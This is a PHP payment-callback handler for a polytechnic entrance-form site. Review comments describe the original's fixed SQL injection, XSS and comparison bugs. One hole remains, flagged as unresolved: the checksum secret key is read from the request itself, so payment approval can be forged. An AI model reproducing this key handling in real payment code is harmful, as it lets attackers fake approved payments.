Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/eace_entranceForm/responseBankIT.php
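<?php
// Payment-gateway response handler, part 1: read the posted transaction result,
// verify FINAL_CHECKSUM, and stop before anything is rendered or written when
// the verification fails.

// The original called session_start() unconditionally and then again inside a
// session_id() check; start the session once, only if none is active.
if (session_status() !== PHP_SESSION_ACTIVE) {
    session_start();
}

// Returns a posted field as a string. A missing field, or one submitted as an
// array (FIELD[]=x), becomes '' instead of raising a notice or "Array".
$postField = static function (string $name): string {
    $value = $_POST[$name] ?? '';
    return is_string($value) ? $value : '';
};

// Session values set earlier in the application flow (null when absent).
$matNo  = $_SESSION['transID'] ?? null;
$ptype  = $_SESSION['ptype2'] ?? null;
$dept   = $_SESSION['dept'] ?? null;
$formNo = $_SESSION['transID'] ?? null;

// Fields posted to this response URL.
$success        = $postField('SUCCESS');
$etztransid     = $postField('TRANSACTION_REF');
$transid        = $postField('TRANSACTION_ID');
$terminal_id    = $postField('TERMINAL_ID');
$final_checksum = $postField('FINAL_CHECKSUM');
$response_url   = $postField('RESPONSE_URL');
$new_checksum   = $postField('CHECKSUM');
$trans_num      = $postField('TRANS_NUM');
$reference      = $postField('DESCRIPTION');
$amount         = $postField('AMOUNT');
$response_code  = $postField('SUCCESS');

// NOTE(review): the key is taken from the request itself, so whoever builds the
// request also chooses the key and can always produce a matching FINAL_CHECKSUM.
// The digest only authenticates the gateway once this value is loaded from
// server-side configuration instead. The storage location is not visible in this
// file, so the assignment is left as it was — treat this as unresolved.
$secret_key = $postField('SECRET_KEY');

$msg = "";
$status_desc = "";
$transDate = time();

// Digest input as implemented here: success + amount + terminal_id + transaction id + secret key.
// NOTE(review): the original comment listed
// "success+trans_amount + merchant_no + merchant_trans_id + response_url + secret_key";
// confirm the field order against the gateway specification.
$finalcheck = hash("sha256", $success . $amount . $terminal_id . $transid . $secret_key);

// The original test was `isset($_POST['FINAL_CHECKSUM']) == $finalcheck`, which compares
// a boolean with a non-empty string and is true whenever the field is present at all.
// Compare the two digests themselves, in constant time; hex is case-insensitive.
if ($final_checksum === '' || !hash_equals($finalcheck, strtolower($final_checksum))) {
    // Fail closed: the rest of the script records the payment and issues a form
    // number, so nothing below may run for an unverified request. The expected
    // digest is deliberately not echoed back to the sender.
    http_response_code(400);
    echo '<p class="error">Wrong FinalCheckSum.</p>';
    exit;
}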
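// Gateway status codes (the posted SUCCESS value) and the text shown for each.
// PHP stores these decimal-string keys as integers; a lookup with "0", "-1", "26"
// still matches, while non-canonical spellings such as "00", " 0" or "0.0" do not.
// The original switch compared loosely, so those spellings were treated as code 0
// and marked the transaction approved.
$statusDescriptions = [
    '0'  => "Approved",
    '-1' => "Transaction timeout or invalid parameters or unsuccessful transaction in the case of Query History",
    '1'  => "Destination Card Not Found",
    '2'  => "Card Number Not Found",
    '3'  => "Invalid Card PIN",
    '4'  => "Card Expiration Incorrect",
    '5'  => "Insufficient balance",
    '6'  => "Spending Limit Exceeded",
    '7'  => "Internal System Error Occurred, please contact the service provider",
    '8'  => "Financial Institution cannot authorize transaction, Please try later",
    '9'  => "PIN tries Exceeded",
    '10' => "Card has been locked",
    '11' => "Invalid Terminal Id",
    '12' => "Payment Timeout",
    '13' => "Destination card has been locked",
    '14' => "Card has expired",
    '15' => "PIN change required",
    '16' => "Invalid Amount",
    '17' => "Card has been disabled",
    '18' => "Unable to credit this account immediately, credit will be done later",
    '19' => "Transaction not permitted on terminal",
    '20' => "Exceeds withdrawal frequency",
    '21' => "Destination Card has expired",
    '22' => "Destination Card Disabled",
    '23' => "Source Card Disabled",
    '24' => "Invalid Bank Account",
    '25' => "Insufficient Balance",
    '26' => "CHECKSUM/FINAL_CHECKSUM error",
];

// A missing or array-valued code can never name a status; treat it as unknown.
$statusKey = is_string($response_code) ? $response_code : '';

if (isset($statusDescriptions[$statusKey])) {
    $status_desc = $statusDescriptions[$statusKey];
} else {
    $status_desc = "Your Transaction was not Successful. No amount was debited from your account.";
}

// Only the exact code "0" counts as an approved payment.
$transApproved = ($statusKey === '0') ? "True" : "False";

// $msg is stored as the transaction detail further down; default it to the status text.
if ($msg == "") {
    $msg = $status_desc;
}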
?>
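<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
    <title></title>
</head>
<body>
<?php
// Payment summary table. $transid, $reference and $amount come straight from the
// POST body, so every value is HTML-escaped before it is written into the page;
// the original echoed them raw, which let a crafted request inject markup or script.
// The commented-out "GET ..." debugging rows from the original were dropped.
?>
<table width="50%" align="center" cellpadding="3" cellspacing="5">
    <tr>
        <td align="center"><img src="../images/eace_siwesHead.png" width="731" height="95"></td>
    </tr>
    <tr>
        <td><fieldset><legend>Payment Detail</legend>
                <div style="text-align: center;">    <form id="form1">
                        <div>
                            <table class="table">
                                <tr class="active">
                                    <td align="left">
                                        <b>Transaction ID:</b></td>
                                    <td><?php echo htmlspecialchars((string) $transid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></td>
                                </tr>
                                <tr class="info">
                                    <td align="left">
                                        <b>Transaction Status:</b></td>
                                    <td><?php echo htmlspecialchars((string) $status_desc, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></td>
                                </tr>
                                <tr class="active">
                                    <td align="left">
                                        <b>Payment Description:</b></td>
                                    <td><?php echo htmlspecialchars((string) $reference, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></td>
                                </tr>
                                <tr class="info">
                                    <td align="left">
                                        <b> Amount:</b></td>
                                    <td><?php echo htmlspecialchars((string) $amount, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></td>
                                </tr>
                            </table>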

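                            <?php
                            // Payment-gateway response handler, part 2: log the callback, record the
                            // transaction status on the order row and, for an approved
                            // "Application Form Fee" payment, issue (or re-display) the form number.
                            //
                            // Every SQL statement below is a prepared statement: $transid, $trans_num
                            // and $reference come from the POST body, and the original spliced them
                            // into the query text, which allowed SQL injection.
                            // NOTE(review): these writes are only as trustworthy as the FINAL_CHECKSUM
                            // verification done earlier in this script — confirm it rejects unverified
                            // requests before this point is reached.
                            require_once('../connect.php');
                            // Assumed to return a PDO handle: the original already relied on
                            // rowCount() and fetch(PDO::FETCH_BOTH) — confirm against connect.php.
                            $db = db_connect();

                            require('../filetoU/logFile.php');

                            // Escapes a value for output inside HTML text or a quoted attribute.
                            $h = static function ($value): string {
                                return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
                            };

                            $orderID = (string) $transid;

                            // Collapse line breaks so request data cannot start a forged entry,
                            // should logDetail() write one line per call (its format is not shown here).
                            $logD = 'Payment. OrderID: ' . $orderID . ' PaymentType: ' . $reference;
                            $logD = str_replace(["\r", "\n"], ' ', $logD);
                            logDetail($matNo, $logD);

                            $orderUpdate = $db->prepare(
                                "UPDATE `fedpoly`.`eace_remitaorderform` SET `remitaRRR` = ?,`transDate` = CURRENT_TIMESTAMP,`transStatus` = ?,`transDetail` = ?,`transApproved` = ? WHERE `orderID` = ?"
                            );
                            $orderUpdate->execute([
                                (string) $trans_num,
                                (string) $response_code,
                                (string) $msg,
                                (string) $transApproved,
                                $orderID,
                            ]);

                            //=====================Application Form ======================================
                            // The original tested `$response_code == 0`; on PHP 7 that is also true for a
                            // missing value or any non-numeric string, so only the exact code "0" is accepted.
                            if ($reference === 'Application Form Fee' && $response_code === '0') {
                                $sessionTransId = (string) $formNo;

                                $formLookup = $db->prepare("select * from eace_entrancetable where transID = ?");
                                $formLookup->execute([$sessionTransId]);
                                $formRow = $formLookup->fetch(PDO::FETCH_BOTH);
                                if ($formRow) {
                                    $ptype = $formRow['formType'];
                                    $dept = $formRow['dept'];
                                }

                                echo '<a href="formPaymentReciept.php" target="_blank">Click Here to Print Application Receipt</a><hr>';

                                // Department code: single-digit departments get a leading zero.
                                $deptCode = ($dept < 10) ? '0' . $dept : $dept;

                                // Form type code.
                                $formCode = ($ptype == 'aceForm') ? '8' : '0';

                                // Serial number: count of forms already issued plus one, zero-padded to five digits.
                                // NOTE(review): two callbacks arriving together can read the same count and
                                // receive the same serial; a unique index on formNo or a dedicated counter
                                // would close that gap.
                                $issuedCount = (int) $db
                                    ->query("select count(*) from eace_entrancetable where formNo<>''")
                                    ->fetchColumn();
                                $realNo = $issuedCount + 1;
                                $serialNo = sprintf('%05d', $realNo);

                                $orderLookup = $db->prepare("select * from eace_remitaorderform where orderID = ?");
                                $orderLookup->execute([$orderID]);
                                $orderRow = $orderLookup->fetch(PDO::FETCH_BOTH);
                                $transCode = $orderRow ? $orderRow['regNo'] : null;

                                $newMatNo = '';
                                if (!$orderRow || $sessionTransId === '') {
                                    // Without an order row or a session transaction id the original compared
                                    // null with null, entered the update branch, and ran
                                    // `jambNo like '%'`, which matches every row of eace_admitted.
                                    echo '<p class="error">No matching order was found for this session.</p>';
                                } elseif ((string) $transCode === (string) $matNo) {
                                    // The order still carries the temporary transaction id: issue the form number.
                                    $newMatNo = '19' . $formCode . $deptCode . $serialNo;

                                    $setOrderRegNo = $db->prepare(
                                        "UPDATE `fedpoly`.`eace_remitaorderform` SET `regNo` = ? WHERE `eace_remitaorderform`.`orderID` = ?"
                                    );
                                    $setOrderRegNo->execute([$newMatNo, $orderID]);

                                    $setEntranceFormNo = $db->prepare(
                                        "UPDATE `fedpoly`.`eace_entrancetable` SET `formNo` = ? WHERE `eace_entrancetable`.`transID` = ?"
                                    );
                                    $setEntranceFormNo->execute([$newMatNo, (string) $transCode]);

                                    // LIKE metacharacters in the session value are escaped so the prefix
                                    // match cannot widen beyond "starts with this id".
                                    $setAdmittedFormNo = $db->prepare(
                                        "UPDATE `fedpoly`.`eace_admitted` SET `formNo` = ?,formStatus=0 WHERE `eace_admitted`.`jambNo` = ? or jambNo like ?"
                                    );
                                    $setAdmittedFormNo->execute([
                                        $newMatNo,
                                        $sessionTransId,
                                        addcslashes($sessionTransId, '\\%_') . '%',
                                    ]);

                                    echo $h($formNo);
                                    $_SESSION['matNo'] = $newMatNo;
                                    echo '<font color="#FF0000"><h2><br> Note: Your form Number is ' . $h($newMatNo) . '</h2></font>';
                                } else {
                                    // A form number was already issued for this order: show the stored one.
                                    $existingLookup = $db->prepare("select * from eace_entrancetable where transID = ?");
                                    $existingLookup->execute([(string) $matNo]);
                                    $existingRow = $existingLookup->fetch(PDO::FETCH_BOTH);
                                    $existingFormNo = $existingRow ? $existingRow['formNo'] : '';

                                    $_SESSION['matNo'] = $newMatNo = $transCode;
                                    echo '<font color="#FF0000"><h2><br> Note: Your form Number is ' . $h($existingFormNo) . '</h2></font>';
                                }

                                if ((string) $newMatNo !== '') {
                                    // Attributes are quoted and the query values URL-encoded; the original
                                    // left both attributes unquoted and inserted the values raw.
                                    echo '<div style="color: #ae2b2b">Kindly Write Down Your Details Before Proceed</div><br>'
                                        . '<a href="apply.php?user=' . rawurlencode((string) $matNo)
                                        . '&amp;formNo=' . rawurlencode((string) $newMatNo)
                                        . '"><p>Click Here to Proceed</p></a>';
                                }
                            }

                            ?>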
                        </div>
                    </form>
</body>
</html>
